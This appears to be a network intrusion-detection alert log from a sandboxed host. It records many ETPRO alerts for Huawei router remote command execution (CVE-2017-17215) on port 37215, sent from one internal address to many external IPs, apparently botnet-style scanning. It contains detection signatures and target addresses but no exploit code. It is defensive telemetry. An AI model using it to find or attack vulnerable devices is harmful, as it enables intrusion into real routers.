                                                        06/13/24-21:33:09.111117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951637215192.168.2.1441.130.166.44
                                                        06/13/24-21:33:17.307026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906037215192.168.2.14197.119.247.29
                                                        06/13/24-21:32:48.552061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4235837215192.168.2.1441.200.178.16
                                                        06/13/24-21:33:02.935491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5194437215192.168.2.14156.1.143.146
                                                        06/13/24-21:31:57.133487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281837215192.168.2.14197.41.9.107
                                                        06/13/24-21:32:17.675869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591837215192.168.2.14156.40.179.38
                                                        06/13/24-21:32:52.680059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390037215192.168.2.14197.80.244.2
                                                        06/13/24-21:33:07.041681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5640637215192.168.2.14197.204.80.95
                                                        06/13/24-21:32:52.659476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5678437215192.168.2.14197.78.55.61
                                                        06/13/24-21:32:21.779999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921037215192.168.2.14156.23.168.32
                                                        06/13/24-21:32:23.940779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134437215192.168.2.1441.175.93.238
                                                        06/13/24-21:32:58.819673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412237215192.168.2.14156.247.172.243
                                                        06/13/24-21:33:17.339812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5614237215192.168.2.14197.243.81.58
                                                        06/13/24-21:32:19.753391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3770837215192.168.2.14156.195.7.164
                                                        06/13/24-21:33:07.057800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5794637215192.168.2.14197.171.227.164
                                                        06/13/24-21:32:03.274651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4033437215192.168.2.1441.130.177.177
                                                        06/13/24-21:32:40.372549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851837215192.168.2.14197.229.68.228
                                                        06/13/24-21:32:09.456399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3595637215192.168.2.14156.103.195.233
                                                        06/13/24-21:32:42.402981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3764437215192.168.2.14156.123.219.108
                                                        06/13/24-21:32:03.309770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553837215192.168.2.1441.55.223.98
                                                        06/13/24-21:32:25.972933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4275037215192.168.2.14197.27.0.95
                                                        06/13/24-21:32:05.369067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5772637215192.168.2.14156.251.4.38
                                                        06/13/24-21:33:11.158296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5231837215192.168.2.1441.9.77.185
                                                        06/13/24-21:33:13.211030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6017637215192.168.2.14197.225.248.225
                                                        06/13/24-21:32:11.485915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933237215192.168.2.14197.206.197.196
                                                        06/13/24-21:32:09.437779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3430837215192.168.2.14197.107.68.74
                                                        06/13/24-21:32:13.545961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3866437215192.168.2.14197.217.204.207
                                                        06/13/24-21:32:38.321178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607837215192.168.2.1441.208.182.178
                                                        06/13/24-21:32:48.552522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5250037215192.168.2.14197.236.90.51
                                                        06/13/24-21:32:44.454021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5802637215192.168.2.14197.31.95.47
                                                        06/13/24-21:33:07.039668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5877637215192.168.2.14197.211.73.44
                                                        06/13/24-21:32:19.727789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643237215192.168.2.14156.179.191.155
                                                        06/13/24-21:32:32.152278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3489037215192.168.2.1441.33.35.235
                                                        06/13/24-21:32:40.354958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4094637215192.168.2.1441.124.153.201
                                                        06/13/24-21:32:52.654042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5342437215192.168.2.1441.35.110.208
                                                        06/13/24-21:32:05.377143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414637215192.168.2.1441.170.45.218
                                                        06/13/24-21:32:07.402128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5572237215192.168.2.14197.255.55.241
                                                        06/13/24-21:32:32.167636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5038437215192.168.2.14197.137.100.80
                                                        06/13/24-21:32:25.990346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3561637215192.168.2.14156.155.197.176
                                                        06/13/24-21:32:15.607963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961837215192.168.2.14156.118.112.87
                                                        06/13/24-21:32:56.755483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516237215192.168.2.14156.78.53.10
                                                        06/13/24-21:32:32.169559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4169037215192.168.2.14156.150.200.162
                                                        06/13/24-21:32:05.348353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4109437215192.168.2.1441.250.161.252
                                                        06/13/24-21:32:03.274815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3614237215192.168.2.14156.98.217.11
                                                        06/13/24-21:31:59.177305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4679637215192.168.2.1441.134.130.152
                                                        06/13/24-21:32:05.348388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4984837215192.168.2.14156.143.19.96
                                                        06/13/24-21:32:15.632816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3427637215192.168.2.14197.208.53.63
                                                        06/13/24-21:32:46.509157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3751037215192.168.2.14197.224.223.250
                                                        06/13/24-21:33:15.259508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896437215192.168.2.1441.170.38.33
                                                        06/13/24-21:32:11.506108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878037215192.168.2.14197.130.234.83
                                                        06/13/24-21:32:52.670488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959637215192.168.2.1441.244.251.75
                                                        06/13/24-21:33:13.213991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5571837215192.168.2.14197.216.43.20
                                                        06/13/24-21:32:25.975071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4359237215192.168.2.14197.189.139.226
                                                        06/13/24-21:32:19.728616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967237215192.168.2.1441.83.188.224
                                                        06/13/24-21:32:21.785878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5736037215192.168.2.1441.178.254.242
                                                        06/13/24-21:33:17.307849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4662637215192.168.2.1441.121.123.149
                                                        06/13/24-21:32:09.457905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238037215192.168.2.1441.11.77.206
                                                        06/13/24-21:32:17.695199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4776037215192.168.2.14156.174.100.66
                                                        06/13/24-21:32:36.263126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591637215192.168.2.14156.40.124.64
                                                        06/13/24-21:32:50.632989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216437215192.168.2.14197.113.196.194
                                                        06/13/24-21:32:09.436997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4726237215192.168.2.14156.166.222.40
                                                        06/13/24-21:32:25.990460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026437215192.168.2.14197.170.206.50
                                                        06/13/24-21:32:05.370670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3377037215192.168.2.14156.253.43.249
                                                        06/13/24-21:32:11.488807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517237215192.168.2.14197.141.77.193
                                                        06/13/24-21:32:34.192271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4973837215192.168.2.1441.117.66.57
                                                        06/13/24-21:32:52.657997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5149437215192.168.2.1441.43.208.6
                                                        06/13/24-21:32:15.610371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4279437215192.168.2.14197.30.188.198
                                                        06/13/24-21:32:34.192684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721837215192.168.2.1441.135.151.99
                                                        06/13/24-21:32:11.509214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3763437215192.168.2.1441.14.227.207
                                                        06/13/24-21:33:05.012882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246437215192.168.2.1441.66.3.159
                                                        06/13/24-21:32:42.406769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515237215192.168.2.1441.15.47.189
                                                        06/13/24-21:32:13.546746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912837215192.168.2.1441.221.39.240
                                                        06/13/24-21:32:19.753736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3823237215192.168.2.1441.135.217.100
                                                        06/13/24-21:33:13.214209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3325637215192.168.2.1441.104.157.124
                                                        06/13/24-21:33:13.228672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4761837215192.168.2.14156.45.119.123
                                                        06/13/24-21:32:15.635770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5953637215192.168.2.14156.95.188.228
                                                        06/13/24-21:32:05.350786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275237215192.168.2.14156.235.49.28
                                                        06/13/24-21:33:15.253350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358037215192.168.2.14156.62.176.74
                                                        06/13/24-21:33:09.088985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4061237215192.168.2.14197.252.193.125
                                                        06/13/24-21:32:03.300862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4850637215192.168.2.14197.242.43.85
                                                        06/13/24-21:32:44.452811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4452437215192.168.2.1441.136.3.13
                                                        06/13/24-21:32:09.456277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4681437215192.168.2.1441.248.44.113
                                                        06/13/24-21:32:19.749550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3628037215192.168.2.14197.68.23.94
                                                        06/13/24-21:32:13.564706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829637215192.168.2.1441.151.126.188
                                                        06/13/24-21:32:15.607135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257037215192.168.2.14156.33.96.8
                                                        06/13/24-21:32:40.377060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673437215192.168.2.1441.191.92.210
                                                        06/13/24-21:33:00.868175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4682637215192.168.2.1441.111.245.234
                                                        06/13/24-21:31:59.194516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3728437215192.168.2.14156.78.43.67
                                                        06/13/24-21:33:13.213129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083437215192.168.2.1441.204.228.64
                                                        06/13/24-21:32:44.455214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658637215192.168.2.1441.248.94.212
                                                        06/13/24-21:32:42.404379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544037215192.168.2.14156.235.201.169
                                                        06/13/24-21:32:19.749072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930837215192.168.2.14197.111.75.179
                                                        06/13/24-21:32:44.450363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5295837215192.168.2.14156.250.156.243
                                                        06/13/24-21:33:09.109991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256437215192.168.2.14156.127.45.140
                                                        06/13/24-21:32:28.044524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4460037215192.168.2.14197.187.198.219
                                                        06/13/24-21:32:32.155933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572437215192.168.2.14197.105.220.206
                                                        06/13/24-21:32:32.156417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3505037215192.168.2.1441.252.36.58
                                                        06/13/24-21:32:52.656895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516037215192.168.2.14197.7.95.150
                                                        06/13/24-21:32:54.708877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4969837215192.168.2.14156.35.149.185
                                                        06/13/24-21:32:36.266901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4356237215192.168.2.14197.158.37.150
                                                        06/13/24-21:32:54.725125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3907237215192.168.2.1441.7.184.121
                                                        06/13/24-21:33:00.866112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5657437215192.168.2.14197.187.77.150
                                                        06/13/24-21:33:05.013277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4952637215192.168.2.14197.152.197.117
                                                        06/13/24-21:33:09.091384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5466637215192.168.2.14197.159.14.173
                                                        06/13/24-21:32:36.245389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3524437215192.168.2.1441.211.111.138
                                                        06/13/24-21:32:28.027361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3922237215192.168.2.1441.9.195.12
                                                        06/13/24-21:33:13.229628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599237215192.168.2.14197.225.130.223
                                                        06/13/24-21:32:17.678815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4746637215192.168.2.14197.235.91.245
                                                        06/13/24-21:32:44.458062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3870037215192.168.2.14197.63.128.64
                                                        06/13/24-21:33:07.041276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077437215192.168.2.14156.235.219.79
                                                        06/13/24-21:32:58.841704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223837215192.168.2.1441.175.49.71
                                                        06/13/24-21:33:15.252558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3377437215192.168.2.14197.19.78.93
                                                        06/13/24-21:32:05.369839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4948037215192.168.2.14197.164.31.104
                                                        06/13/24-21:32:09.456241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025237215192.168.2.14156.168.52.149
                                                        06/13/24-21:32:25.993361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863637215192.168.2.14197.168.131.41
                                                        06/13/24-21:32:25.978215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4542837215192.168.2.14197.212.69.158
                                                        06/13/24-21:32:34.217517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3687437215192.168.2.14156.96.34.64
                                                        06/13/24-21:32:30.079544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3991837215192.168.2.14156.19.229.188
                                                        06/13/24-21:32:40.356806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3407437215192.168.2.14197.48.202.63
                                                        06/13/24-21:32:19.751906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635437215192.168.2.1441.93.253.192
                                                        06/13/24-21:32:17.695819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892237215192.168.2.14197.229.1.88
                                                        06/13/24-21:33:07.057978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5805437215192.168.2.14197.232.38.6
                                                        06/13/24-21:32:21.800248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5717837215192.168.2.14156.223.27.223
                                                        06/13/24-21:32:54.709644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3878037215192.168.2.1441.101.140.88
                                                        06/13/24-21:32:25.995259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5655437215192.168.2.14156.66.9.131
                                                        06/13/24-21:32:58.820695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3345237215192.168.2.14156.118.84.126
                                                        06/13/24-21:33:07.056271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5547437215192.168.2.14156.51.6.73
                                                        06/13/24-21:33:07.040241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485437215192.168.2.14197.249.206.165
                                                        06/13/24-21:32:23.833472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408437215192.168.2.14197.93.37.57
                                                        06/13/24-21:32:50.615777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3884637215192.168.2.1441.182.140.163
                                                        06/13/24-21:32:03.308159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956037215192.168.2.14197.93.229.54
                                                        06/13/24-21:32:48.553984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299837215192.168.2.1441.44.60.87
                                                        06/13/24-21:32:03.274054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534237215192.168.2.14156.18.235.240
                                                        06/13/24-21:32:54.724987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325237215192.168.2.14197.176.47.184
                                                        06/13/24-21:32:23.835979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405037215192.168.2.14156.45.250.5
                                                        06/13/24-21:31:59.177275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834637215192.168.2.14156.88.172.221
                                                        06/13/24-21:32:50.632189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5892237215192.168.2.14156.149.249.136
                                                        06/13/24-21:33:17.304400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530837215192.168.2.14197.128.30.18
                                                        06/13/24-21:32:05.350508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074237215192.168.2.14156.144.75.148
                                                        06/13/24-21:32:32.168616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352637215192.168.2.14197.22.240.73
                                                        06/13/24-21:32:56.756139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4616437215192.168.2.14156.8.118.85
                                                        06/13/24-21:32:30.123787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4974437215192.168.2.14197.217.17.183
                                                        06/13/24-21:32:13.566467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958637215192.168.2.14197.226.7.1
                                                        06/13/24-21:32:48.572395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894437215192.168.2.14197.234.28.137
                                                        06/13/24-21:33:13.229112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519437215192.168.2.14197.13.212.169
                                                        06/13/24-21:32:23.942481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118437215192.168.2.14197.70.140.205
                                                        06/13/24-21:33:11.174708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5858437215192.168.2.1441.195.140.14
                                                        06/13/24-21:32:50.610432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4137237215192.168.2.1441.203.226.11
                                                        06/13/24-21:33:13.212152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3539237215192.168.2.1441.179.96.217
                                                        06/13/24-21:31:59.198678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469437215192.168.2.14197.52.185.92
                                                        06/13/24-21:32:05.370923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5995837215192.168.2.14197.63.150.180
                                                        06/13/24-21:33:02.952581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4130037215192.168.2.14197.186.147.91
                                                        06/13/24-21:32:23.943047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3462637215192.168.2.1441.135.106.159
                                                        06/13/24-21:33:00.866764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716037215192.168.2.1441.92.181.84
                                                        06/13/24-21:32:40.354114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5403037215192.168.2.14197.93.65.189
                                                        06/13/24-21:32:13.569448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5628237215192.168.2.14156.249.251.40
                                                        06/13/24-21:32:42.419577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834037215192.168.2.1441.4.61.157
                                                        06/13/24-21:32:09.437506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4651837215192.168.2.14156.13.165.93
                                                        06/13/24-21:32:30.100202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5048837215192.168.2.14197.106.42.110
                                                        06/13/24-21:33:02.914510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336637215192.168.2.14156.211.251.13
                                                        06/13/24-21:33:15.257623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6075837215192.168.2.14197.237.226.102
                                                        06/13/24-21:32:36.266163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5758237215192.168.2.14156.10.157.55
                                                        06/13/24-21:32:17.697227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5877637215192.168.2.1441.85.102.104
                                                        06/13/24-21:32:11.486117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3615037215192.168.2.14156.111.142.139
                                                        06/13/24-21:33:00.888117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4795837215192.168.2.1441.165.101.115
                                                        06/13/24-21:32:19.754398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942637215192.168.2.1441.242.216.239
                                                        06/13/24-21:32:38.318099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4747637215192.168.2.1441.43.172.222
                                                        06/13/24-21:32:07.417464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5293837215192.168.2.1441.185.93.27
                                                        06/13/24-21:32:21.784162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4655837215192.168.2.1441.21.15.163
                                                        06/13/24-21:32:58.841506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3702237215192.168.2.14197.47.152.181
                                                        06/13/24-21:32:09.457149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565637215192.168.2.1441.172.83.247
                                                        06/13/24-21:33:09.101896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926837215192.168.2.14156.77.122.243
                                                        06/13/24-21:31:57.154198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4047237215192.168.2.14197.117.47.205
                                                        06/13/24-21:32:07.417899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201037215192.168.2.14156.88.182.121
                                                        06/13/24-21:32:40.358349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3763837215192.168.2.14156.4.185.62
                                                        06/13/24-21:32:09.439310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4165837215192.168.2.1441.234.185.127
                                                        06/13/24-21:32:56.784051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800237215192.168.2.14156.203.24.250
                                                        06/13/24-21:33:15.276239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3407837215192.168.2.14156.71.105.26
                                                        06/13/24-21:33:17.304691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682037215192.168.2.14197.187.167.167
                                                        06/13/24-21:32:21.802783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5220637215192.168.2.1441.77.26.50
                                                        06/13/24-21:32:52.660671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797437215192.168.2.14197.89.45.248
                                                        06/13/24-21:33:04.992777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5385837215192.168.2.1441.203.21.226
                                                        06/13/24-21:32:21.802020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3446437215192.168.2.14156.202.98.105
                                                        06/13/24-21:31:57.093007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121437215192.168.2.14156.6.58.55
                                                        06/13/24-21:32:05.348552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382437215192.168.2.14156.23.174.155
                                                        06/13/24-21:32:54.708574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4592437215192.168.2.14197.210.88.217
